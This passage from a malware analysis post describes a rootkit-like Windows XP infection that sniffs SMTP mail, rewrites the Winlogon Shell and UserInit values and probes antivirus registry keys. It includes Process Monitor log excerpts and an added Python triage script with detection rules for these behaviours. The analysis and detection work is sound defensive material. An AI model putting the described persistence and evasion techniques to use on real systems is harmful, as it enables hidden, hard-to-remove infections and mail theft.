HiJackThis.exe IRP_MJ_CLOSE C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9 SUCCESS
HiJackThis.exe IRP_MJ_CLEANUP C:\WINDOWS\system32\stdole2.tlb SUCCESS
I don’t think it’s on purpose; the same “instructions” are applied to all running processes, but they don’t get killed. Occasionally it does happen with ProcessGuard too. In the past MSN Messenger got terminated also, but it doesn’t happen anymore.

As for mmg.cn, the purpose is clear … sniffing outgoing SMTP mail. I don’t think that needs further explanation or testing.

When bringing up detailed information about an operation, one sees 2 or more unknown modules in the stack during non-standard winlogon.exe operations. That is the only “visible” sign of the XORed files being loaded.

Each application tries to load nvrsma.dll but indeed gets a SHARING VIOLATION error. The sample below shows the HijackThis process.

QUOTE
64755 3:55:09.4755677 PM HiJackThis.exe 948 QueryOpen C:\WINDOWS\system32\nvrsma.dll FAST IO DISALLOWED
64756 3:55:09.4759789 PM HiJackThis.exe 948 CreateFile C:\WINDOWS\system32\nvrsma.dll SUCCESS Desired Access: Read Attributes, Disposition: Open, Options: Open Reparse Point, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, OpenResult: Opened
64791 3:55:09.4856879 PM HiJackThis.exe 948 QueryBasicInformationFile C:\WINDOWS\system32\nvrsma.dll SUCCESS CreationTime: 1/6/2008 3:52:20 PM, LastAccessTime: 1/6/2008 3:53:14 PM, LastWriteTime: 1/6/2008 3:52:20 PM, ChangeTime: 1/6/2008 3:52:20 PM, FileAttributes: A
64793 3:55:09.4864531 PM HiJackThis.exe 948 CloseFile C:\WINDOWS\system32\nvrsma.dll SUCCESS
64801 3:55:09.4881195 PM HiJackThis.exe 948 CreateFile C:\WINDOWS\system32\nvrsma.dll SHARING VIOLATION Desired Access: Execute/Traverse, Synchronize, Disposition: Open, Options: Synchronous IO Non-alert, Non-Directory File, Attributes: n/a, ShareMode: Read, Delete, AllocationSize: n/a
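The four behaviours the Process Monitor excerpts in the Notes above show (the All Access sweep of HKLM\Software, the probes for anti-malware vendor keys, the RegSetValue on the Winlogon Shell and UserInit values, and the SHARING VIOLATION other processes get when they try to map nvrsma.dll) are the kind of thing worth turning into triage rules over a ProcMon CSV export instead of scrolling a 154 MB log. The script below is an added example, not the poster's code. Its input rows are constructed by re-typing the post's excerpts in ProcMon's CSV export layout (Time of Day, Process Name, PID, Operation, Path, Result, Detail) with made-up PIDs and timestamps; the vendor key list is taken from the post and is an assumption for any other environment; the stock Shell and UserInit values are the ones the post's RegQueryValue lines show for Windows XP.

```python
import csv
import io
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample, not a real capture: the post's Process Monitor excerpts
# re-typed in ProcMon's CSV export layout. PIDs and timestamps are assumptions.
# The last row is a product reading a single vendor key, so the sweep threshold
# has a benign case to leave alone.
PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"3:53:20.1000000 PM","winlogon.exe","612","RegOpenKey","HKLM\Software\2","SUCCESS","Desired Access: All Access"
"3:53:20.1000100 PM","winlogon.exe","612","RegOpenKey","HKLM\Software\AutoIt v3","SUCCESS","Desired Access: All Access"
"3:53:20.1000200 PM","winlogon.exe","612","RegOpenKey","HKLM\Software\C07ft5Y","SUCCESS","Desired Access: All Access"
"3:53:20.1000300 PM","winlogon.exe","612","RegOpenKey","HKLM\Software\Classes","SUCCESS","Desired Access: All Access"
"3:53:21.0000000 PM","winlogon.exe","612","RegOpenKey","HKLM\Software\KasperskyLab","SUCCESS","Desired Access: Read"
"3:53:21.0000100 PM","winlogon.exe","612","RegOpenKey","HKLM\Software\McAfee\VirusScan","SUCCESS","Desired Access: Read"
"3:53:21.0000200 PM","winlogon.exe","612","RegOpenKey","HKLM\Software\Symantec\Symantec AntiVirus","NAME NOT FOUND","Desired Access: Read"
"3:53:21.0000300 PM","winlogon.exe","612","RegOpenKey","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ClamAV","NAME NOT FOUND","Desired Access: Read"
"3:53:22.0000000 PM","winlogon.exe","612","RegQueryValue","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","SUCCESS","Type: REG_SZ, Length: 26, Data: Explorer.exe"
"3:53:22.0000100 PM","winlogon.exe","612","RegSetValue","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","SUCCESS","Type: REG_SZ, Length: 48, Data: c:\windows\explorer.exe"
"3:53:22.0000200 PM","winlogon.exe","612","RegSetValue","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit","SUCCESS","Type: REG_SZ, Length: 66, Data: c:\windows\system32\userinit.exe"
"3:55:09.4881195 PM","HiJackThis.exe","948","CreateFile","C:\WINDOWS\system32\nvrsma.dll","SHARING VIOLATION","Desired Access: Execute/Traverse, Synchronize, Disposition: Open, Options: Synchronous IO Non-alert, Non-Directory File, Attributes: n/a, ShareMode: Read, Delete, AllocationSize: n/a"
"3:55:10.0000000 PM","avgas.exe","1200","RegOpenKey","HKLM\Software\KasperskyLab","NAME NOT FOUND","Desired Access: Read"
'''

WINLOGON_KEY = "hklm\\software\\microsoft\\windows nt\\currentversion\\winlogon\\"
# Stock Windows XP values, as the RegQueryValue lines in the post show them.
STOCK_VALUES = {"shell": "explorer.exe", "userinit": "c:\\windows\\system32\\userinit.exe,"}
# Vendor key fragments seen in the post's log (assumption: extend for your estate).
SECURITY_PRODUCT_KEYS = re.compile(r"kasperskylab|mcafee|symantec|clamav|antivir|grisoft|spybot", re.I)


def parse_procmon_csv(text: str) -> List[Dict[str, str]]:
    return list(csv.DictReader(io.StringIO(text)))


def _data(detail: str) -> str:
    """The 'Data: ...' tail of a registry value Detail field."""
    m = re.search(r"Data: (.*)$", detail)
    return m.group(1).strip() if m else ""


def triage(rows: List[Dict[str, str]], sweep_threshold: int = 3) -> List[Dict]:
    findings: List[Dict] = []
    product_probes: Dict[str, set] = defaultdict(set)   # process -> vendor keys touched
    all_access: Dict[str, set] = defaultdict(set)       # process -> HKLM\Software subkeys opened All Access
    for r in rows:
        proc, op, path = r["Process Name"], r["Operation"], r["Path"]
        result, detail = r["Result"], r["Detail"]
        lpath, ldetail = path.lower(), detail.lower()
        # Rule 1: anything writing the Winlogon Shell/UserInit values, and whether
        # what it wrote is the stock value or a rewritten one.
        if op == "RegSetValue" and lpath.startswith(WINLOGON_KEY):
            value = lpath[len(WINLOGON_KEY):]
            if value in STOCK_VALUES:
                findings.append({"rule": "winlogon_value_rewritten", "process": proc,
                                 "value": value, "data": _data(detail),
                                 "matches_stock": _data(detail).lower() == STOCK_VALUES[value]})
        # Rule 2: a process probing several security-product keys (presence check).
        if op == "RegOpenKey" and SECURITY_PRODUCT_KEYS.search(path):
            product_probes[proc].add(lpath)
        # Rule 3: walking HKLM\Software with All Access rather than Read.
        if op == "RegOpenKey" and lpath.startswith("hklm\\software\\") and "all access" in ldetail:
            all_access[proc].add(lpath)
        # Rule 4: a DLL nobody else can open for execute, i.e. held exclusively.
        if op == "CreateFile" and result == "SHARING VIOLATION" and lpath.endswith(".dll") and "execute" in ldetail:
            findings.append({"rule": "locked_dll", "process": proc, "path": path})
    for proc, keys in product_probes.items():
        if len(keys) >= sweep_threshold:
            findings.append({"rule": "security_product_sweep", "process": proc, "count": len(keys)})
    for proc, keys in all_access.items():
        if len(keys) >= sweep_threshold:
            findings.append({"rule": "all_access_enum", "process": proc, "count": len(keys)})
    return findings


def run_example() -> List[Dict]:
    return triage(parse_procmon_csv(PROCMON_CSV))


if __name__ == "__main__":
    for f in run_example():
        print(f)
```

Both RegSetValue findings come back with matches_stock False: vtnr.gpg writes a lower-case full path for Shell and drops the trailing comma from UserInit, so even its "repair" leaves values that differ from what a clean XP install has. That difference is worth remembering when looking at a machine after the fact, since it survives the removal of the rest of the infection. The thresholds are deliberately low for a 13-row sample; on a real export raise them and filter on the process of interest first.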

Conclusion


This infection is very complex. All the different modules rely on / depend on each other, and debugging is very difficult. It clearly has rootkit behaviour.

Passwords and all sensitive information should be changed after a cleanup. Do not attempt to clean out this infection yourself; seek help on the forums instead. If user32.dll gets deleted by your antivirus software, you’ll end up with a new desktop picture during the next boot.
